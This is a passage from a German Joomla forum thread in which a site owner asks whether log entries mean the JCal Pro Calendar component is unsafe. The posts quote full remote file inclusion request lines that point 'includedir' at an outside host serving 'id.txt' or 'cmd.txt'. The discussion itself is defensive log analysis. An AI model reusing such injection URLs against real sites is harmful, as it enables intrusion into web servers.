+ Antworten
Seite 1 von 3 1 2 3 LetzteLetzte
Ergebnis 1 bis 10 von 23

Thema: JCal Pro Calendar 1.5 sicher?

  1. 09.10.2007 07:00 #1
    GeoB
    GeoB ist offline
    Neu an Board
    Registriert seit
    15.05.2006
    Beiträge
    43
    Bedankte sich
    29
    Erhielt 6 Danksagungen
    in 6 Beiträgen

    Ausrufezeichen JCal Pro Calendar 1.5 sicher?

    Hallo,
    hab da mal eine Frage zum Thema Sicherheit.
    Täglich finde ich in meinen Logs folgende Einträge:

    "http://www.meinedomain.com/index.php?option=com_jcalp...tmode=day&date=2007-08-17/tools/send_reminders.php?includedir=http://XXXXXXXX..net/id.txt?"

    "http://www.meinedomain.com/index.php?option=com_jcalp...tmode=day&date=2007-07-13/tools/send_reminders.php?includedir=http://XXXXXXXX.com/cmd.txt?"

    Wie sicher ist JCal Pro Calendar 1.5?
    Können die Scripts Schaden anrichten?

    Meine System Informationen:
    Provider: 1und1

    PHP built On: Linux infong 2.4 #1 SMP Thu Jan 13 08:59:31 CET 2005 i686 unknown
    Database Version: 4.0.27-standard-log
    PHP Version: 4.4.7
    Web Server: Apache/1.3.33 (Unix)
    WebServer to PHP interface: cgi
    Joomla! Version: Joomla! 1.0.12 Stable [ Sunfire ] 25 December 2006 01:00 UTC
    User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

    Relevant PHP Settings:

    Joomla! Register Globals Emulation: OFF
    Register Globals: OFF
    Magic Quotes: ON
    Safe Mode: OFF
    File Uploads: ON
    Session auto start: OFF
    Session save path: /tmp
    Short Open Tags: ON
    Output Buffering: OFF
    Open basedir: none
    Display Errors: ON
    XML enabled: Yes
    Zlib enabled: Yes
    Disabled Functions: none
    Zitieren Zitieren
  2. 09.10.2007 07:11 #2
    keraM
    keraM ist offline
    Gute Seele des Boards Avatar von keraM
    Registriert seit
    12.03.2006
    Ort
    Dresden
    Beiträge
    10.592
    Bedankte sich
    152
    Erhielt 2.558 Danksagungen
    in 2.360 Beiträgen

    Standard

    Das Wichtigste dieser Logeinträge hast Du abgeschnitten. Poste bitte mal die kompletten Zeilen.
    Gruß keraM
    Joomla-FAQ: --> Klick!
    Support per PN: --> Klick!
    Zitieren Zitieren

  3. Erhielt Danksagungen von:

    GeoB
  4. 09.10.2007 07:30 #3
    GeoB
    GeoB ist offline
    Neu an Board
    Registriert seit
    15.05.2006
    Beiträge
    43
    Bedankte sich
    29
    Erhielt 6 Danksagungen
    in 6 Beiträgen

    Standard

    Zitat Zitat von keraM Beitrag anzeigen
    Das Wichtigste dieser Logeinträge hast Du abgeschnitten. Poste bitte mal die kompletten Zeilen.
    Danke für die schnelle Antwort!

    Ein Beispiel:

    "http://www.meinedomain.com/index.php?option=com_jcalp...tmode=day&date=2007-08-17/tools/send_reminders.php?includedir=http://drpepper.gigacities.net/id.txt?"

    Möchte hier nicht alle Domains auflisten.
    Zitieren Zitieren
  5. 09.10.2007 07:35 #4
    langsch2
    langsch2 ist offline
    Kommt häufiger vorbei
    Registriert seit
    25.07.2005
    Beiträge
    434
    Bedankte sich
    16
    Erhielt 120 Danksagungen
    in 107 Beiträgen

    Standard

    Zitat Zitat von GeoB Beitrag anzeigen
    Danke für die schnelle Antwort!

    Ein Beispiel:

    "http://www.meinedomain.com/index.php?option=com_jcalp...tmode=day&date=2007-08-17/tools/send_reminders.php?includedir=http://drpepper.gigacities.net/id.txt?"

    Möchte hier nicht alle Domains auflisten.
    Wichtig ist das ENDE der Zeile, die Zahl die dort steht. Also 200, 404, oder 504 z.B.

    ******************** http://www.langschnet.de*********************
    *Netzwerktechnik*Managed Hosting-V-Server-Server* Nur Firmen!

    Zitieren Zitieren

  6. Erhielt Danksagungen von:

    GeoB
  7. 09.10.2007 07:50 #5
    GeoB
    GeoB ist offline
    Neu an Board
    Registriert seit
    15.05.2006
    Beiträge
    43
    Bedankte sich
    29
    Erhielt 6 Danksagungen
    in 6 Beiträgen

    Standard

    Zitat Zitat von langsch2 Beitrag anzeigen
    Wichtig ist das ENDE der Zeile, die Zahl die dort steht. Also 200, 404, oder 504 z.B.
    Danke für die schnelle Antwort!
    Also:

    " XXX.XXX.XXX.XXX - - [09/Oct/2007:04:08:25 +0200] "GET /index.php?option=com_jcalp...tmode=day&date=2007-08-17//tools/send_reminders.php?includedir=http://drpepper.gigacities.net/id.txt? HTTP/1.1" 404 13667 www.meinedomain.com "-" "libwww-perl/5.79" "-"

    und

    XXX.XXX.XXX.XXX - - [09/Oct/2007:04:08:32 +0200] "GET //tools/send_reminders.php?includedir=http://drpepper.gigacities.net/id.txt? HTTP/1.1" 404 619 www.meinedomain.com "-" "libwww-perl/5.79" "-" "
    Zitieren Zitieren
  8. 09.10.2007 08:27 #6
    keraM
    keraM ist offline
    Gute Seele des Boards Avatar von keraM
    Registriert seit
    12.03.2006
    Ort
    Dresden
    Beiträge
    10.592
    Bedankte sich
    152
    Erhielt 2.558 Danksagungen
    in 2.360 Beiträgen

    Standard

    Und hier kannst Du jetzt nachlesen, was der http Statuscode bedeutet.
    Gruß keraM
    Joomla-FAQ: --> Klick!
    Support per PN: --> Klick!
    Zitieren Zitieren

  9. Erhielt Danksagungen von:

    GeoB
  10. 09.10.2007 09:18 #7
    GeoB
    GeoB ist offline
    Neu an Board
    Registriert seit
    15.05.2006
    Beiträge
    43
    Bedankte sich
    29
    Erhielt 6 Danksagungen
    in 6 Beiträgen

    Standard

    Zitat Zitat von keraM Beitrag anzeigen
    Und hier kannst Du jetzt nachlesen, was der http Statuscode bedeutet.
    Also wenn ich dass "herauslese":
    "404 Not Found: der Server kann die Methode nicht ausführen, weil die Seite nicht gefunden wurde"

    Dann wäre dass ein abgewehrter Angriff also "Sicher"?
    Zitieren Zitieren
  11. 09.10.2007 09:22 #8
    keraM
    keraM ist offline
    Gute Seele des Boards Avatar von keraM
    Registriert seit
    12.03.2006
    Ort
    Dresden
    Beiträge
    10.592
    Bedankte sich
    152
    Erhielt 2.558 Danksagungen
    in 2.360 Beiträgen

    Standard

    Richtig. Man hat es versucht, ist aber gescheitert.
    Gruß keraM
    Joomla-FAQ: --> Klick!
    Support per PN: --> Klick!
    Zitieren Zitieren

  12. Erhielt Danksagungen von:

    GeoB
  13. 09.10.2007 09:27 #9
    GeoB
    GeoB ist offline
    Neu an Board
    Registriert seit
    15.05.2006
    Beiträge
    43
    Bedankte sich
    29
    Erhielt 6 Danksagungen
    in 6 Beiträgen

    Daumen hoch

    Zitat Zitat von keraM Beitrag anzeigen
    Richtig. Man hat es versucht, ist aber gescheitert.
    Da bin ich aber erleichtert !!

    Danke nochmals !!
    Zitieren Zitieren
  14. 09.10.2007 11:03 #10
    flotte
    flotte ist offline
    Moderator Avatar von flotte
    Registriert seit
    20.03.2005
    Ort
    Neustadt
    Beiträge
    5.301
    Bedankte sich
    66
    Erhielt 1.258 Danksagungen
    in 1.101 Beiträgen

    Standard

    Zitat Zitat von keraM Beitrag anzeigen
    Richtig. Man hat es versucht, ist aber gescheitert.
    Achtung!
    Die URL also solches würde normalerweise einen Status-Code 200 zurückliefern, weil seine Domain samt Datei http://www.meinedomain.com/index.php ja sicher erreichbar ist. Ob die Übergabeparameter Erfolg haben oder nicht, das zeigt der Statuscode NICHT mehr an.

    Weil aber ein 404-Code zurückgegeben wurde, denke ich das lediglich eine Agent-Sperre für libwww aktiv ist.

    Die Frage bleibt:
    Hat J-Cal Pro hier ggf. eine Sicherheitslücke?
    Gruß! Uwe

    fc-hosting.de
    . . . . . . . . . . . .kleine Joomla-Helferlein :: Gehackt? Was tun? :: Migration 1.7->2.5
    Zitieren Zitieren

  15. Erhielt Danksagungen von:

    GeoB
+ Antworten
Seite 1 von 3 1 2 3 LetzteLetzte
« Vorheriges Thema | Nächstes Thema »

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein

Foren-Regeln